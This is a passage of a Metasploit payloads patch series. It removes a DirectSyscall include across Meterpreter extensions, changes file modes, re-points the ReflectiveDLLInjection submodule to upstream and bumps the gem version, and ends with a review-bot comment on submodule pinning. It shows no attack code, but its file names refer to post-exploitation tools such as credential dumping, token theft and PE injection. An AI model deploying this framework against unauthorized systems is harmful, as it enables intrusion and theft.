@@ -1 +1 @@ -Subproject commit 77be380836a54218a76d1aadfd3846c1e62f0edd +Subproject commit 920db0b6cbb3fbfcd1cc3e34da3b481998a84a16 diff --git a/c/meterpreter/source/common/common_command_ids.h b/c/meterpreter/source/common/common_command_ids.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c b/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h b/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/dump_sam/dump_sam.c b/c/meterpreter/source/dump_sam/dump_sam.c old mode 100755 new mode 100644 index 4250198d3..4e4f90041 --- a/c/meterpreter/source/dump_sam/dump_sam.c +++ b/c/meterpreter/source/dump_sam/dump_sam.c @@ -7,7 +7,6 @@ #define RDIDLL_NOEXPORT #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "ReflectiveLoader.c" diff --git a/c/meterpreter/source/dump_sam/dump_sam.def b/c/meterpreter/source/dump_sam/dump_sam.def old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/elevator/elevator.c b/c/meterpreter/source/elevator/elevator.c old mode 100755 new mode 100644 index aeeade136..cd360f73f --- a/c/meterpreter/source/elevator/elevator.c +++ b/c/meterpreter/source/elevator/elevator.c @@ -17,7 +17,6 @@ #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT -#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /* diff --git a/c/meterpreter/source/extensions/bofloader/bofloader.c b/c/meterpreter/source/extensions/bofloader/bofloader.c old mode 100755 new mode 100644 index 869578620..8e8fe5d6e --- a/c/meterpreter/source/extensions/bofloader/bofloader.c +++ b/c/meterpreter/source/extensions/bofloader/bofloader.c 
@@ -13,7 +13,6 @@ // Required so that use of the API works. MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /*! @brief The enabled commands for this extension. */ diff --git a/c/meterpreter/source/extensions/espia/espia.c b/c/meterpreter/source/extensions/espia/espia.c old mode 100755 new mode 100644 index 7ada3666f..06787d0d6 --- a/c/meterpreter/source/extensions/espia/espia.c +++ b/c/meterpreter/source/extensions/espia/espia.c @@ -11,7 +11,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" Command customCommands[] = diff --git a/c/meterpreter/source/extensions/extapi/extapi.c b/c/meterpreter/source/extensions/extapi/extapi.c old mode 100755 new mode 100644 index 85a465074..f78025122 --- a/c/meterpreter/source/extensions/extapi/extapi.c +++ b/c/meterpreter/source/extensions/extapi/extapi.c @@ -10,7 +10,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "window.h" diff --git a/c/meterpreter/source/extensions/extapi/ntds.c b/c/meterpreter/source/extensions/extapi/ntds.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/incognito/incognito.c b/c/meterpreter/source/extensions/incognito/incognito.c old mode 100755 new mode 100644 index af8eeb509..ce97bce7b --- a/c/meterpreter/source/extensions/incognito/incognito.c +++ b/c/meterpreter/source/extensions/incognito/incognito.c @@ -15,7 +15,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" DWORD request_incognito_list_tokens(Remote *remote, Packet *packet); 
diff --git a/c/meterpreter/source/extensions/kiwi/main.c b/c/meterpreter/source/extensions/kiwi/main.c index 8186e3431..fd47a8552 100755 --- a/c/meterpreter/source/extensions/kiwi/main.c +++ b/c/meterpreter/source/extensions/kiwi/main.c @@ -10,7 +10,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "main.h" diff --git a/c/meterpreter/source/extensions/lanattacks/lanattacks.c b/c/meterpreter/source/extensions/lanattacks/lanattacks.c old mode 100755 new mode 100644 index 476ecf4a2..db69a4fb7 --- a/c/meterpreter/source/extensions/lanattacks/lanattacks.c +++ b/c/meterpreter/source/extensions/lanattacks/lanattacks.c @@ -9,7 +9,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include #include "lanattacks.h" diff --git a/c/meterpreter/source/extensions/peinjector/headers.h b/c/meterpreter/source/extensions/peinjector/headers.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpefile.c b/c/meterpreter/source/extensions/peinjector/libpefile.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpefile.h b/c/meterpreter/source/extensions/peinjector/libpefile.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect.c b/c/meterpreter/source/extensions/peinjector/libpeinfect.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect.h b/c/meterpreter/source/extensions/peinjector/libpeinfect.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.c b/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.c old mode 100755 new mode 100644 
diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.h b/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpetool.c b/c/meterpreter/source/extensions/peinjector/libpetool.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpetool.h b/c/meterpreter/source/extensions/peinjector/libpetool.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/peinjector.c b/c/meterpreter/source/extensions/peinjector/peinjector.c old mode 100755 new mode 100644 index cf005be73..6d7bccf38 --- a/c/meterpreter/source/extensions/peinjector/peinjector.c +++ b/c/meterpreter/source/extensions/peinjector/peinjector.c @@ -9,7 +9,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "peinjector_bridge.h" diff --git a/c/meterpreter/source/extensions/peinjector/peinjector.h b/c/meterpreter/source/extensions/peinjector/peinjector.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/peinjector_bridge.c b/c/meterpreter/source/extensions/peinjector/peinjector_bridge.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/peinjector_bridge.h b/c/meterpreter/source/extensions/peinjector/peinjector_bridge.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell.c b/c/meterpreter/source/extensions/powershell/powershell.c old mode 100755 new mode 100644 index c9993abd9..a95ca1221 --- a/c/meterpreter/source/extensions/powershell/powershell.c +++ b/c/meterpreter/source/extensions/powershell/powershell.c 
@@ -9,7 +9,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "powershell_bridge.h" diff --git a/c/meterpreter/source/extensions/powershell/powershell.h b/c/meterpreter/source/extensions/powershell/powershell.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell_bindings.cpp b/c/meterpreter/source/extensions/powershell/powershell_bindings.cpp old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell_bindings.h b/c/meterpreter/source/extensions/powershell/powershell_bindings.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell_bridge.cpp b/c/meterpreter/source/extensions/powershell/powershell_bridge.cpp old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell_bridge.h b/c/meterpreter/source/extensions/powershell/powershell_bridge.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/elevate.c b/c/meterpreter/source/extensions/priv/elevate.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/elevate.h b/c/meterpreter/source/extensions/priv/elevate.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/namedpipe_efs.c b/c/meterpreter/source/extensions/priv/namedpipe_efs.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/priv.c b/c/meterpreter/source/extensions/priv/priv.c old mode 100755 new mode 100644 index 6fa39cb5a..36cc04d73 --- a/c/meterpreter/source/extensions/priv/priv.c +++ b/c/meterpreter/source/extensions/priv/priv.c @@ -8,7 +8,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /*! 
diff --git a/c/meterpreter/source/extensions/priv/priv.rc b/c/meterpreter/source/extensions/priv/priv.rc old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/resource.h b/c/meterpreter/source/extensions/priv/resource.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/python/python_commands.c b/c/meterpreter/source/extensions/python/python_commands.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/python/python_commands.h b/c/meterpreter/source/extensions/python/python_commands.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/python/python_main.c b/c/meterpreter/source/extensions/python/python_main.c old mode 100755 new mode 100644 index 09a862805..e7d9b8c55 --- a/c/meterpreter/source/extensions/python/python_main.c +++ b/c/meterpreter/source/extensions/python/python_main.c @@ -10,7 +10,6 @@ MetApi* met_api = NULL; #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "python_commands.h" diff --git a/c/meterpreter/source/extensions/python/python_meterpreter_binding.c b/c/meterpreter/source/extensions/python/python_meterpreter_binding.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/sniffer/sniffer.c b/c/meterpreter/source/extensions/sniffer/sniffer.c old mode 100755 new mode 100644 index 44756bf8e..45838ff87 --- a/c/meterpreter/source/extensions/sniffer/sniffer.c +++ b/c/meterpreter/source/extensions/sniffer/sniffer.c 
@@ -36,7 +36,6 @@ Command customCommands[] = // but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the // second stage reflective dll inject payload and not the metsrv itself when it loads extensions. #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #define check_pssdk(); if(!hMgr && pktsdk_initialize()!=0){ met_api->packet.transmit_response(hErr, remote, response);return(hErr); } diff --git a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/stdapi/server/stdapi.c b/c/meterpreter/source/extensions/stdapi/server/stdapi.c index 503cd0426..c9f54d2d0 100755 --- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c +++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c @@ -9,7 +9,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" // NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor diff --git a/c/meterpreter/source/extensions/stdapi/stdapi.h b/c/meterpreter/source/extensions/stdapi/stdapi.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/unhook/unhook.c b/c/meterpreter/source/extensions/unhook/unhook.c old mode 100755 new mode 100644 index 1a7d350a7..381dba3f1 --- a/c/meterpreter/source/extensions/unhook/unhook.c +++ b/c/meterpreter/source/extensions/unhook/unhook.c @@ -6,7 +6,6 @@ #include "common_metapi.h" #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "unhook.h" 
diff --git a/c/meterpreter/source/extensions/winpmem/winpmem.cpp b/c/meterpreter/source/extensions/winpmem/winpmem.cpp old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/winpmem/winpmem.h b/c/meterpreter/source/extensions/winpmem/winpmem.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp b/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp old mode 100755 new mode 100644 index f8646af4e..e85e7bb37 --- a/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp +++ b/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp @@ -7,7 +7,6 @@ extern "C" { #include "common_metapi.h" #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #ifndef min diff --git a/c/meterpreter/source/metsrv/metsrv.c b/c/meterpreter/source/metsrv/metsrv.c old mode 100755 new mode 100644 index b039e3bc4..93773e661 --- a/c/meterpreter/source/metsrv/metsrv.c +++ b/c/meterpreter/source/metsrv/metsrv.c @@ -10,7 +10,6 @@ #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "../ReflectiveDLLInjection/inject/src/GetProcAddressR.c" #include "../ReflectiveDLLInjection/inject/src/LoadLibraryR.c" diff --git a/c/meterpreter/source/metsrv/metsrv.h b/c/meterpreter/source/metsrv/metsrv.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/metsrv/server_pivot_named_pipe.c b/c/meterpreter/source/metsrv/server_pivot_named_pipe.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/screenshot/screenshot.c b/c/meterpreter/source/screenshot/screenshot.c old mode 100755 new mode 100644 index 1a70b6d25..11d49ad52 --- a/c/meterpreter/source/screenshot/screenshot.c +++ b/c/meterpreter/source/screenshot/screenshot.c 
@@ -9,7 +9,6 @@ #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT -#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /* From 1556007bfdf1583f3815e41315e6ad507ad23fe0 Mon Sep 17 00:00:00 2001 From: Christophe De La Fuente Date: Fri, 12 Jan 2024 19:24:01 +0100 Subject: [PATCH 11/14] Update ReflectiveDLLInjection submodule to pull in Win10/8 x86 fix --- .gitmodules | 2 +- c/meterpreter/source/ReflectiveDLLInjection | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/.gitmodules b/.gitmodules index c9e32c313..0bc9322f8 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,7 +1,7 @@ [submodule "source/ReflectiveDLLInjection"] path = c/meterpreter/source/ReflectiveDLLInjection url = https://github.com/cdelafuente-r7/ReflectiveDLLInjection.git - branch = direct_syscalls2 + branch = direct_syscalls_fix_win10x86 [submodule "deps"] path = c/meterpreter/deps url = https://github.com/rapid7/meterpreter-deps diff --git a/c/meterpreter/source/ReflectiveDLLInjection b/c/meterpreter/source/ReflectiveDLLInjection index 920db0b6c..e6d144c06 160000 --- a/c/meterpreter/source/ReflectiveDLLInjection +++ b/c/meterpreter/source/ReflectiveDLLInjection @@ -1 +1 @@ -Subproject commit 920db0b6cbb3fbfcd1cc3e34da3b481998a84a16 +Subproject commit e6d144c067a34cc1b5f91fba62fdc123c65fe859 From 83fa146f7523628fb6d01e304446be4eba5d18e1 Mon Sep 17 00:00:00 2001 From: Christophe De La Fuente Date: Tue, 16 Jan 2024 18:27:36 +0100 Subject: [PATCH 12/14] Update ReflectiveDLLInjection submodule to pull in new trampoline detection logic --- c/meterpreter/source/ReflectiveDLLInjection | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/c/meterpreter/source/ReflectiveDLLInjection b/c/meterpreter/source/ReflectiveDLLInjection index e6d144c06..7d38d3757 160000 --- a/c/meterpreter/source/ReflectiveDLLInjection +++ b/c/meterpreter/source/ReflectiveDLLInjection 
@@ -1 +1 @@ -Subproject commit e6d144c067a34cc1b5f91fba62fdc123c65fe859 +Subproject commit 7d38d3757d4305bd5044145fa16ce40aa8761a7a From c7abd47585ae8d59685ca2c394d8313e7b6d19f1 Mon Sep 17 00:00:00 2001 From: Christophe De La Fuente Date: Fri, 19 Jan 2024 17:40:45 +0100 Subject: [PATCH 13/14] Update the ReflectiveDLLInjection submodule to the upstream repository --- .gitmodules | 3 +-- c/meterpreter/source/ReflectiveDLLInjection | 2 +- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/.gitmodules b/.gitmodules index 0bc9322f8..68c4a63e0 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,7 +1,6 @@ [submodule "source/ReflectiveDLLInjection"] path = c/meterpreter/source/ReflectiveDLLInjection - url = https://github.com/cdelafuente-r7/ReflectiveDLLInjection.git - branch = direct_syscalls_fix_win10x86 + url = https://github.com/rapid7/ReflectiveDLLInjection.git [submodule "deps"] path = c/meterpreter/deps url = https://github.com/rapid7/meterpreter-deps diff --git a/c/meterpreter/source/ReflectiveDLLInjection b/c/meterpreter/source/ReflectiveDLLInjection index 7d38d3757..81cde88be 160000 --- a/c/meterpreter/source/ReflectiveDLLInjection +++ b/c/meterpreter/source/ReflectiveDLLInjection @@ -1 +1 @@ -Subproject commit 7d38d3757d4305bd5044145fa16ce40aa8761a7a +Subproject commit 81cde88bebaa9fe782391712518903b5923470fb From 7ff8ee535f2d29c39c8d176d2d5a7baad1889c06 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 19 Jan 2024 11:20:36 -0600 Subject: [PATCH 14/14] Bump metasploit-payloads to 2.0.166 --- gem/lib/metasploit-payloads/version.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/gem/lib/metasploit-payloads/version.rb b/gem/lib/metasploit-payloads/version.rb index c3dc1d272..88e1011d4 100644 --- a/gem/lib/metasploit-payloads/version.rb +++ b/gem/lib/metasploit-payloads/version.rb @@ -1,6 +1,6 @@ # -*- coding:binary -*- module MetasploitPayloads - VERSION = '2.0.165' + VERSION = '2.0.166' def self.version VERSION
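Review bot: Dropping `branch = direct_syscalls_fix_win10x86` together with the URL switch to `https://github.com/rapid7/ReflectiveDLLInjection.git` means `git submodule update --remote` now follows the upstream default branch, while the build actually consumes the gitlink `81cde88bebaa9fe782391712518903b5923470fb`; those two can drift apart without anything in the repository noticing. The commit description should state which upstream commit or tag carries the work from the earlier fork branches (`direct_syscalls2`, `direct_syscalls_fix_win10x86`) so a reviewer can confirm the pinned commit is reachable from the rapid7 repository and not only from the personal fork it previously pointed at. A one-line comment in .gitmodules above the `url` line, `# pinned via the gitlink; see PR description for the upstream commit`, would make that expectation visible to the next person who runs `--remote`.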